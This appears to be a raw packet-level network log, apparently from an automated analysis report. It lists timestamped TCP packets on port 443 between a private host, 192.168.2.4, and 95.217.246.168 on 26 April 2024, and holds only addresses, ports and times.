Apr 26, 2024 21:35:41.354152918 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.354182959 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.354195118 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.363013029 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.363028049 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.363092899 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.363100052 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.363141060 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.371701956 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.371717930 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.371788979 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.371803045 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.371840000 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.381423950 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.381431103 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.381481886 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.381490946 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.381504059 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.381530046 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.391834021 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.391849995 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.391927958 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.391938925 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.391980886 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.401196003 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.401213884 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.401283026 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.401288033 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.401314974 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.401330948 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.411611080 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.411627054 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.411806107 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.411815882 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.411864042 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.425721884 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.425735950 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.425817966 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.425826073 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.425870895 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.433796883 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.433811903 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.433870077 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.433886051 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.433933020 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.442589045 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.442604065 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.442661047 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.442677975 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.442724943 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.451025009 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.451039076 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.451095104 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.451102018 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.451141119 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.451164007 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.459081888 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.459103107 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.459157944 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.459165096 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.459204912 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.465995073 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.466012001 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.466062069 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.466070890 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.466109991 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.473890066 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.473916054 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.473987103 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.474000931 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.474041939 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.480104923 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.480118990 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.480192900 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.480199099 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.480269909 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.488339901 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.488356113 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.488461018 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.488467932 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.488511086 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.495353937 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.495368958 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.495444059 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.495451927 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.495498896 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.503088951 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.503103018 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.503170967 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.503177881 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.503206015 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.503221035 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.510384083 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.510401011 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.510490894 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.510499001 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.510543108 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.518062115 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.518070936 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.518188000 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.518244028 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.518287897 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.528922081 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.528938055 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.529030085 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.529051065 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.529093027 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.531711102 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.531724930 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.531797886 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.531817913 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.531861067 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.538223028 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.538239002 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.538316965 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.538328886 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.538373947 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.545480013 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.545496941 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.545573950 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.545582056 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.545641899 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.580167055 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.580183983 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.580270052 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.580290079 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.580336094 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.583574057 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.583583117 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.583681107 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.583688974 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.583731890 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.587214947 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.587229967 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.587296009 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.587302923 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.587348938 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.590260983 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.590275049 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.590341091 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.590348959 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.590389013 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.594129086 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.594151974 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.594213963 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.594221115 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.594259977 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.597610950 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.597625017 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.597695112 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.597704887 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.597748041 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.601651907 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.601666927 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.601735115 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.601742983 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.601787090 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.607661009 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.607676029 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.607745886 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.607758999 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.607805014 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.613209963 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.613224030 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.613284111 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.613291979 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.613348007 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.617542982 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.617557049 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.617614985 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.617621899 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.617665052 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.622116089 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.622131109 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.622196913 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.622205019 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.622248888 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.627310991 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.627326012 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.627398968 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.627407074 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.627449989 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.632376909 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.632391930 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.632469893 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.632477999 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.632523060 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.637048006 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.637063026 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.637124062 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.637131929 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.637176991 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.642328024 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.642345905 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.642412901 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.642420053 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.642463923 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.647855997 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.647870064 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.647936106 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.647943020 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.647986889 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.656383038 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.656395912 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.656472921 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.656481028 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.656524897 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.657629013 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.657687902 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.673129082 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.673162937 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.673206091 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.673360109 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.676332951 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.676348925 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.676418066 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.676425934 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.676470995 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.677160025 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.678252935 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.681528091 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.681541920 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.681602955 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.681610107 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.681653976 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.689816952 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.689832926 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.689934015 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.689941883 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.689986944 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.694014072 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.694029093 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.694099903 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.694107056 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.694144964 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.698039055 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.698051929 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.698126078 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.698132992 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.698193073 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.704056025 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.704070091 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.704139948 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.704147100 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.704185963 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.707572937 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.707587004 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.707672119 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.707679033 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.707724094 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.711604118 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.711618900 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.711685896 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.711695910 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.711733103 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.715542078 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.715560913 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.715627909 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.715637922 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.715679884 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.719340086 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.719356060 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.719403982 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.719412088 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.719449997 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.722454071 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.722467899 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.722527027 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.722533941 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.722582102 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.725790977 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.725805044 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.725868940 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.725876093 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.725908995 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.725928068 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.744213104 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.744231939 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.744306087 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.744322062 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.744368076 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.752814054 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.752831936 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.752890110 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.752904892 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.752918005 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.752943993 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.755976915 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.755990982 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.756046057 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.756057978 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.756073952 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.756094933 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.759744883 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.759759903 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.759823084 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.759833097 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.759876013 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.762737036 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.762753010 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.762835026 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.762840986 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.762882948 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.765799999 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.765822887 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.765889883 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.765898943 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.765923977 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.765935898 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.768754959 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.768773079 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.768831968 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.768838882 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.768896103 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.772595882 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.772612095 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.772672892 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.772680044 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.772723913 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.775711060 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.775768042 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.775772095 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.775787115 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.775799036 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.775819063 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.775841951 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.779136896 CEST	49751	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.779156923 CEST	443	49751	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.862724066 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.862771034 CEST	443	49752	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:41.862848043 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.863075018 CEST	49752	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:41.863089085 CEST	443	49752	95.217.246.168	192.168.2.4
